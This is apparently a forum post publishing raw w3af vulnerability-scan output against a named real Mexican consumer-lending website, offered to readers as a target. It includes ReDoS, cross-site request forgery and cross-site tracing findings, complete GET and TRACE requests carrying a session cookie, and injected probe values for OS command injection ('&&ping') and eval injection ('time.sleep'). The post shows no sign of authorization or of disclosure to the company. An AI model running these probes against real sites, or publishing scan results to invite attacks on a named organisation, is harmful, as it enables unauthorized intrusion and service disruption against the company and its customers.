Greetings, Free World.
Here is another website vulnerable to ReDoS, to XSRF (get_xsrf) and to XST (xst).
This is a company that lends money, aimed at housewives.
Scan:
http://www.provident.com.mx/pages/campaign_lp_v1?gclid=CJD-8bTDhqkCFSUZQgodzRFmoQ
[Thu 26 May 2011 12:08:12 PM EDT] Auto-enabling plugin: grep.collectCookies
[Thu 26 May 2011 12:08:12 PM EDT] Auto-enabling plugin: grep.httpAuthDetect
[Thu 26 May 2011 12:08:12 PM EDT] Auto-enabling plugin: grep.error500
[Thu 26 May 2011 12:08:12 PM EDT] Auto-enabling plugin: discovery.serverHeader
[Thu 26 May 2011 12:08:12 PM EDT] Auto-enabling plugin: discovery.allowedMethods
[Thu 26 May 2011 12:08:12 PM EDT] Auto-enabling plugin: discovery.frontpage_version
[Thu 26 May 2011 12:08:12 PM EDT] Auto-enabling plugin: grep.passwordProfiling
[Thu 26 May 2011 12:08:12 PM EDT] Auto-enabling plugin: grep.getMails
[Thu 26 May 2011 12:08:12 PM EDT] Auto-enabling plugin: grep.lang
[Thu 26 May 2011 12:08:19 PM EDT] The "lang" plugin took more than 5 seconds to run. For a plugin that should only perform pattern matching, this is too much, please review its source code.
[Thu 26 May 2011 12:08:24 PM EDT] The "passwordProfiling" plugin took more than 5 seconds to run. For a plugin that should only perform pattern matching, this is too much, please review its source code.
[Thu 26 May 2011 12:08:38 PM EDT] The page language is: es
[Thu 26 May 2011 12:08:39 PM EDT] The server header for the remote web server is: "Apache". This information was found in the request with id 16.
[Thu 26 May 2011 12:08:46 PM EDT] Starting formAuthBrute plugin execution.
[Thu 26 May 2011 12:08:46 PM EDT] Starting basicAuthBrute plugin execution.
[Thu 26 May 2011 12:08:46 PM EDT] Found 3 URLs and 5 different points of injection.
[Thu 26 May 2011 12:08:46 PM EDT] The list of URLs is:
[Thu 26 May 2011 12:08:46 PM EDT] - http://www.provident.com.mx/pages/campaign_lp_v1
[Thu 26 May 2011 12:08:46 PM EDT] - http://www.provident.com.mx/pages/campaign_lp_v1?gclid=CJD-8bTDhqkCFSUZQgodzRFmoQ
[Thu 26 May 2011 12:08:46 PM EDT] - http://www.provident.com.mx/pages/search
[Thu 26 May 2011 12:08:46 PM EDT] The list of fuzzable requests is:
[Thu 26 May 2011 12:08:46 PM EDT] - http://www.provident.com.mx/pages/campaign_lp_v1 | Method: GET | Parameters: (gclid="CJD-8bTDhq...")
[Thu 26 May 2011 12:08:46 PM EDT] - http://www.provident.com.mx/pages/campaign_lp_v1?gclid=CJD-8bTDhqkCFSUZQgodzRFmoQ | Method: POST | Parameters: (data[LoanSearchData][amount]="")
[Thu 26 May 2011 12:08:46 PM EDT] - http://www.provident.com.mx/pages/campaign_lp_v1?gclid=CJD-8bTDhqkCFSUZQgodzRFmoQ | Method: POST | Parameters: (data[LoanSearchData][amount]="10000")
[Thu 26 May 2011 12:08:46 PM EDT] - http://www.provident.com.mx/pages/campaign_lp_v1?gclid=CJD-8bTDhqkCFSUZQgodzRFmoQ | Method: POST | Parameters: (data[LoanSearchData][amount]="3900")
[Thu 26 May 2011 12:08:46 PM EDT] - http://www.provident.com.mx/pages/search | Method: GET | Parameters: (q="")
[Thu 26 May 2011 12:08:56 PM EDT] The web application sent a persistent cookie.
[Thu 26 May 2011 12:08:56 PM EDT] The following scripts are vulnerable to a trivial form of XSRF:
[Thu 26 May 2011 12:08:56 PM EDT] - http://www.provident.com.mx/pages/search
[Thu 26 May 2011 12:08:56 PM EDT] - http://www.provident.com.mx/pages/campaign_lp_v1
[Thu 26 May 2011 12:10:02 PM EDT] The URL: http://www.provident.com.mx/pages/campaign_lp_v1 is vulnerable to cross site request forgery.
[Thu 26 May 2011 12:10:02 PM EDT] The URL: http://www.provident.com.mx/pages/search is vulnerable to cross site request forgery.
[Thu 26 May 2011 12:10:02 PM EDT] The server header for the remote web server is: "Apache". This information was found in the request with id 16.
[Thu 26 May 2011 12:10:02 PM EDT] The remote Web server has a custom configuration, in which any non existent methods that are invoked are defaulted to GET instead of returning a "Not Implemented" response. This information was found in the requests with ids 19 to 20.
[Thu 26 May 2011 12:10:02 PM EDT] The URL: "http://www.provident.com.mx/pages/campaign_lp_v1" sent the cookie: "CAKEPHP=qvivclbqgoan0nbnrrl95pqq42; path=/". This information was found in the request with id 1.
[Thu 26 May 2011 12:10:02 PM EDT] The URL: "http://www.provident.com.mx/_vti_inf.html" sent the cookie: "CAKEPHP=qvivclbqgoan0nbnrrl95pqq42; path=/". This information was found in the request with id 21.
[Thu 26 May 2011 12:10:02 PM EDT] The URL: "http://www.provident.com.mx/pages/_vti_inf.html" sent the cookie: "CAKEPHP=qvivclbqgoan0nbnrrl95pqq42; path=/". This information was found in the request with id 22.
[Thu 26 May 2011 12:10:02 PM EDT] The URL: "http://www.provident.com.mx/pages/search" sent the cookie: "CAKEPHP=qvivclbqgoan0nbnrrl95pqq42; path=/". This information was found in the request with id 32.
[Thu 26 May 2011 12:11:02 PM EDT] A possible ReDoS was found at: "http://www.provident.com.mx/pages/campaign_lp_v1", using HTTP method GET. The sent data was: "gclid=11111111111111111111111111111111199%21". . Please review manually. This information was found in the request with id 239.
[Thu 26 May 2011 12:11:02 PM EDT] ReDoS was found at: "http://www.provident.com.mx/pages/search", using HTTP method GET. The sent data was: "q=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaXX%21". This vulnerability was found in the request with id 245.
[Thu 26 May 2011 12:13:22 PM EDT] A possible OS Commanding was found at: "http://www.provident.com.mx/pages/search", using HTTP method GET. The sent data was: "q=%26%26ping+-c+9+localhost".Please review manually. This information was found in the request with id 327.
[Thu 26 May 2011 12:14:35 PM EDT] eval() input injection was found at: "http://www.provident.com.mx/pages/campaign_lp_v1", using HTTP method GET. The sent data was: "gclid=import+time%3Btime.sleep(9)%3B". . Please review manually. This information was found in the request with id 569.
[Thu 26 May 2011 12:16:06 PM EDT] The web server at "http://www.provident.com.mx/pages/" is vulnerable to Cross Site Tracing. This vulnerability was found in the request with id 730.
[Thu 26 May 2011 12:19:00 PM EDT] Password profiling TOP 100:
[Thu 26 May 2011 12:19:00 PM EDT] The cookie: "CAKEPHP=qvivclbqgoan0nbnrrl95pqq42; path=/" was sent by these URLs:
[Thu 26 May 2011 12:19:00 PM EDT] - http://www.provident.com.mx/pages/ZEPQu.html
[Thu 26 May 2011 12:19:00 PM EDT] - http://www.provident.com.mx/pages/campaign_lp_v1
[Thu 26 May 2011 12:19:00 PM EDT] - http://www.provident.com.mx/pages/
[Thu 26 May 2011 12:19:00 PM EDT] - http://www.provident.com.mx/pages/search
[Thu 26 May 2011 12:19:00 PM EDT] - http://www.provident.com.mx/_vti_inf.html
[Thu 26 May 2011 12:19:00 PM EDT] - http://www.provident.com.mx/pages/EEfFv
[Thu 26 May 2011 12:19:00 PM EDT] - http://www.provident.com.mx/pages/_vti_bin/_vti_aut/author.dll
[Thu 26 May 2011 12:19:00 PM EDT] - http://www.provident.com.mx/pages/_vti_inf.html
[Thu 26 May 2011 12:19:00 PM EDT] Finished scanning process.
redos: ReDoS vulnerability.
ReDoS was found at: "http://www.provident.com.mx/pages/search", using HTTP method GET. The sent data was: "q=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaXX%21". This vulnerability was found in the request with id 245.
GET http://www.provident.com.mx/pages/search?q=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaXX%21 HTTP/1.1
Host: www.provident.com.mx
Cookie: path=/; CAKEPHP=qvivclbqgoan0nbnrrl95pqq42;
Accept-encoding: identity
Accept: */*
User-agent: w3af.sourceforge.net
xsrf: get_xsrf
The URL: http://www.provident.com.mx/pages/campaign_lp_v1 is vulnerable to cross site request forgery.
xst: xst
The web server at "http://www.provident.com.mx/pages/" is vulnerable to Cross Site Tracing. This vulnerability was found in the request with id 730.
TRACE http://www.provident.com.mx/pages/?gclid=CJD-8bTDhqkCFSUZQgodzRFmoQ HTTP/1.1
Host: www.provident.com.mx
Cookie: path=/; CAKEPHP=qvivclbqgoan0nbnrrl95pqq42;
Accept-encoding: identity
Accept: */*
User-agent: w3af.sourceforge.net
Information link: http://en.wikipedia.org/wiki/ReDoS
There, I leave it with you.
Greetings, Free World.